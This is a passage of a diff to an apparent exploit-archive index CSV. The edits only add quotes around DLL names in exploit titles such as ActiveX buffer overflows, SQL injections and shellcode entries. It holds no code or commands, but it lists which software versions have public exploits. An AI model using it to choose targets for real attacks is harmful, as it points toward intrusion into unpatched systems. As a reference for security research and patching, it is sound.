WriteFile Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16519,platforms/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16521,platforms/windows/remote/16521.rb,"Microsoft Windows Media Encoder 9 - wmex.dll ActiveX Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger - YVerInfo.dll ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16521,platforms/windows/remote/16521.rb,"Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger - 'YVerInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16523,platforms/windows/remote/16523.rb,"Novell iPrint Client - ActiveX Control target-frame Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16524,platforms/windows/remote/16524.rb,"AwingSoft Winds3D Player - SceneURL Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger - goaway Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16526,platforms/windows/remote/16526.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",2010-08-12,Metasploit,windows,remote,0 16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 - RTSP URI Buffer Overflow (Metasploit)",2010-05-04,Metasploit,windows,remote,0 16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16529,platforms/windows/remote/16529.rb,"WinDVD7 - IASystemInfo.dll ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16529,platforms/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16530,platforms/windows/remote/16530.rb,"mIRC - IRC URL Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling (Metasploit)",2010-07-03,Metasploit,windows,remote,0 @@ -14356,7 +14356,7 @@ id,file,description,date,author,platform,type,port 16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (Metasploit)",2010-09-28,Metasploit,windows,remote,0 16542,platforms/windows/remote/16542.rb,"Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16543,platforms/windows/remote/16543.rb,"Novell iPrint Client - ActiveX Control Date/Time Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail - epi.dll AuthCredential Format String (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail - 'epi.dll' AuthCredential Format String (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16545,platforms/windows/remote/16545.rb,"Microsoft Help Center - Cross-Site Scripting / Command Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16546,platforms/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (1)",2010-09-20,Metasploit,windows,local,0 16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (Metasploit)",2010-07-12,Metasploit,windows,remote,0 @@ -14365,22 +14365,22 @@ id,file,description,date,author,platform,type,port 16550,platforms/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,windows,remote,0 16551,platforms/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (Metasploit)",2011-01-20,Metasploit,windows,remote,0 16552,platforms/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16553,platforms/windows/remote/16553.rb,"BaoFeng Storm - mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16553,platforms/windows/remote/16553.rb,"BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16554,platforms/windows/remote/16554.rb,"America Online ICQ - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (Metasploit)",2010-07-12,Metasploit,windows,remote,0 16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 - (ASX Filename) Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0 -16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar - askBar.dll ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar - 'askBar.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16558,platforms/windows/remote/16558.rb,"Apple QuickTime 7.6.6 - Invalid SMIL URI Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,remote,0 16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer - ActiveX Control Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16560,platforms/windows/remote/16560.rb,"Autodesk IDrop - ActiveX Control Heap Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0 -16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer - vcst_eu.dll ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 +16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0 -16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll 4.9 - ActiveX Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16565,platforms/windows/remote/16565.rb,"RKD Software 'BarCodeAx.dll' 4.9 - ActiveX Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0 16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE - JuniperSetupDLL.dll ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE - 'JuniperSetupDLL.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16569,platforms/windows/remote/16569.rb,"Orbit Downloader - Connecting Log Creation Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16570,platforms/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 - SceneURL Download and Execute (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16571,platforms/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -14396,7 +14396,7 @@ id,file,description,date,author,platform,type,port 16581,platforms/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020)",2010-08-25,Metasploit,windows,remote,0 16582,platforms/windows/remote/16582.rb,"Symantec BackupExec Calendar Control - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16583,platforms/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16584,platforms/windows/remote/16584.rb,"RealPlayer - rmoc3260.dll ActiveX Control Heap Corruption (Metasploit)",2010-06-15,Metasploit,windows,remote,0 +16584,platforms/windows/remote/16584.rb,"RealPlayer - 'rmoc3260.dll' ActiveX Control Heap Corruption (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16585,platforms/windows/remote/16585.rb,"Sun Java - Web Start Plugin Command Line Argument Injection (Metasploit)",2010-09-21,Metasploit,windows,remote,0 16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer - SMIL Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16587,platforms/windows/remote/16587.rb,"Sun Java - Runtime New Plugin docbase Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,remote,0 @@ -14416,14 +14416,14 @@ id,file,description,date,author,platform,type,port 16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16602,platforms/windows/remote/16602.rb,"Macrovision Installshield Update Service - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16603,platforms/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16604,platforms/windows/remote/16604.rb,"WebEx UCF - atucfobj.dll ActiveX NewObject Method Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16604,platforms/windows/remote/16604.rb,"WebEx UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16605,platforms/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16606,platforms/windows/local/16606.rb,"Adobe - Collab.getIcon() Buffer Overflow (1)",2010-04-30,Metasploit,windows,local,0 16607,platforms/windows/remote/16607.rb,"WinZip FileView - (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16608,platforms/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata 'in_mp3.dll' - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16612,platforms/windows/remote/16612.rb,"Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)",2010-09-20,Metasploit,windows,local,0 @@ -14450,7 +14450,7 @@ id,file,description,date,author,platform,type,port 16635,platforms/windows/remote/16635.rb,"activePDF WebGrabber - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player - MKV Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0 -16638,platforms/windows/remote/16638.rb,"DjVu - DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,remote,0 +16638,platforms/windows/remote/16638.rb,"DjVu - 'DjVu_ActiveX_MSOffice.dll' ActiveX ComponentBuffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,remote,0 16639,platforms/windows/remote/16639.rb,"McAfee Remediation Client - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,remote,0 @@ -14461,7 +14461,7 @@ id,file,description,date,author,platform,type,port 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 HT3 - File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 -16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - WkImgSrv.dll WKsPictureInterface() ActiveX Exploit (Metasploit)",2010-09-25,Metasploit,windows,remote,0 +16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX Exploit (Metasploit)",2010-09-25,Metasploit,windows,remote,0 16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (2)",2010-09-25,Metasploit,windows,local,0 16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0 @@ -14550,7 +14550,7 @@ id,file,description,date,author,platform,type,port 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Windows x86) Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,windows,remote,0 +16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21 16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (Metasploit)",2010-11-12,Metasploit,windows,remote,21 16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 @@ -14573,7 +14573,7 @@ id,file,description,date,author,platform,type,port 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 - WebTools Buffer Overflow (Metasploit)",2010-07-16,Metasploit,windows,remote,9999 16759,platforms/win_x86/remote/16759.rb,"SHTTPD 1.34 (Windows x86) - URI-Encoded POST Request Overflow (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0 16760,platforms/windows/remote/16760.rb,"Private Wire Gateway - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,80 -16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - ext.dll Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,80 +16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - 'ext.dll' Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,80 16762,platforms/windows/remote/16762.rb,"BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,80 16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)",2010-04-30,Metasploit,win_x86,remote,8000 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,Metasploit,windows,remote,0 @@ -14605,7 +14605,7 @@ id,file,description,date,author,platform,type,port 16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 -16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - webquery.dll Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80 +16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - 'webquery.dll' Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80 16794,platforms/windows/remote/16794.rb,"httpdx - tolog() Function Format String (2)",2010-08-25,Metasploit,windows,remote,80 16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0 16796,platforms/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80 @@ -14864,7 +14864,7 @@ id,file,description,date,author,platform,type,port 17069,platforms/php/webapps/17069.txt,"oscss2 2.1.0 rc12 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 17070,platforms/windows/dos/17070.py,"Rumble 0.25.2232 - Denial of Service",2011-03-29,"AutoSec Tools",windows,dos,0 17071,platforms/windows/dos/17071.py,"GOM Player 2.1.28.5039 - AVI Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0 -17072,platforms/windows/dos/17072.py,"Microsoft Windows Explorer 6.0.2900.5512 - (Shmedia.dll 6.0.2900.5512) AVI Preview Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0 +17072,platforms/windows/dos/17072.py,"Microsoft Windows Explorer 6.0.2900.5512 - 'Shmedia.dll 6.0.2900.5512' AVI Preview Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0 17074,platforms/windows/dos/17074.py,"Winamp 5.61 - AVI Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0 17075,platforms/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 - '.avi' Denial of Service (PoC)",2011-03-30,BraniX,windows,dos,0 17076,platforms/php/webapps/17076.txt,"YaCOMAS 0.3.6 Alpha - Multiple Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 @@ -14921,7 +14921,7 @@ id,file,description,date,author,platform,type,port 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b - Local File Inclusion",2011-04-07,Osirys,php,webapps,0 17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 - (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0 17132,platforms/php/webapps/17132.py,"Joomla! Component com_virtuemart 1.1.7 - Blind SQL Injection",2011-04-08,"TecR0c and mr_me",php,webapps,0 -17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - afd.sys Local Kernel Denial of Service",2011-04-08,"Lufeng Li",windows,dos,0 +17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service",2011-04-08,"Lufeng Li",windows,dos,0 17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17136,platforms/php/webapps/17136.txt,"Joomla! Component JCE (com_jce) - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0 @@ -15176,7 +15176,7 @@ id,file,description,date,author,platform,type,port 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",windows,local,0 17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 - CSService Logging Path Parameter Buffer Overflow (Metasploit)",2011-06-25,Metasploit,windows,remote,0 17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,Metasploit,windows,remote,0 -17451,platforms/windows/local/17451.rb,"Microsoft Visio - VISIODWG.dll DXF File Handling (Metasploit)",2011-06-26,Metasploit,windows,local,0 +17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (Metasploit)",2011-06-26,Metasploit,windows,local,0 17452,platforms/php/webapps/17452.txt,"Joomla! Component JoomlaXi - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",php,webapps,0 17453,platforms/php/webapps/17453.txt,"WordPress Plugin Beer Recipes 1.0 - Cross-Site Scripting",2011-06-26,TheUzuki.',php,webapps,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection",2011-06-28,hamt0ry,php,webapps,0 @@ -15250,12 +15250,12 @@ id,file,description,date,author,platform,type,port 17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection",2011-07-14,LiquidWorm,php,webapps,0 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection",2011-07-14,Netrondoank,php,webapps,0 17535,platforms/multiple/remote/17535.rb,"Java RMI - Server Insecure Default Configuration Java Code Execution (Metasploit)",2011-07-15,Metasploit,multiple,remote,0 -40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - mrxdav.sys WebDav Privilege Escalation (MS16-016)",2016-07-11,Metasploit,windows,local,0 +40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016)",2016-07-11,Metasploit,windows,local,0 17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Cookie Handling Buffer Overflow (Metasploit)",2011-07-16,Metasploit,windows,remote,0 17539,platforms/windows/remote/17539.rb,"Freefloat FTP Server 1.00 - MKD Buffer Overflow",2011-07-17,"C4SS!0 G0M3S",windows,remote,0 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server - MKD Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote,0 17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow (Metasploit)",2011-07-17,Metasploit,windows,remote,0 -17544,platforms/windows/dos/17544.txt,"GDI+ - CreateDashedPath Integer Overflow in gdiplus.dll",2011-07-18,Abysssec,windows,dos,0 +17544,platforms/windows/dos/17544.txt,"GDI+ - 'gdiplus.dll' CreateDashedPath Integer Overflow",2011-07-18,Abysssec,windows,dos,0 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 TR - Add Admin _kpss_ Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0 17546,platforms/windows/remote/17546.py,"Freefloat FTP Server 1.0 - REST & PASV Buffer Overflow",2011-07-18,"C4SS!0 G0M3S",windows,remote,0 17553,platforms/php/webapps/17553.txt,"Joomla! Component Appointment Booking Pro - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps,0 @@ -15269,7 +15269,7 @@ id,file,description,date,author,platform,type,port 17557,platforms/windows/remote/17557.html,"Dell IT Assistant - detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote,0 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - egghunt Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0 17560,platforms/php/webapps/17560.txt,"Joomla! Component mod_spo - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0 -17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 KisKrnl.sys 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 +17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0 @@ -15691,7 +15691,7 @@ id,file,description,date,author,platform,type,port 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 18050,platforms/php/webapps/18050.txt,"Joomla! Component HM-Community com_hmcommunity - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 18051,platforms/windows/remote/18051.txt,"BroadWin Webaccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote,0 -18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute arsqls24.dll Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,windows,dos,0 +18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,windows,dos,0 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0 18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 @@ -15867,7 +15867,7 @@ id,file,description,date,author,platform,type,port 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0 18412,platforms/php/webapps/18412.php,"WordPress Plugin Kish Guest Posting 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 18287,platforms/php/webapps/18287.php,"Joomla! Component Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps,0 -18285,platforms/windows/dos/18285.py,"VideoLAN VLC Media Player 1.1.11 - (libav) libavcodec_plugin.dll Denial of Service",2011-12-28,"Mitchell Adair",windows,dos,0 +18285,platforms/windows/dos/18285.py,"VideoLAN VLC Media Player 1.1.11 - (libav) 'libavcodec_plugin.dll' Denial of Service",2011-12-28,"Mitchell Adair",windows,dos,0 18288,platforms/php/webapps/18288.txt,"DIY-CMS blog mod - SQL Injection",2011-12-29,snup,php,webapps,0 18290,platforms/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,php,webapps,0 18291,platforms/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS) Exploit",2011-12-30,cheffner,hardware,remote,0 @@ -15947,7 +15947,7 @@ id,file,description,date,author,platform,type,port 18384,platforms/php/webapps/18384.txt,"PHPBridges Blog System - members.php SQL Injection",2012-01-18,3spi0n,php,webapps,0 18385,platforms/php/webapps/18385.txt,"DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 18386,platforms/php/webapps/18386.txt,"DZCP (deV!L_z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 -18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager - ov.dll _OVBuildPath Buffer Overflow (Metasploit)",2012-01-20,Metasploit,windows,remote,0 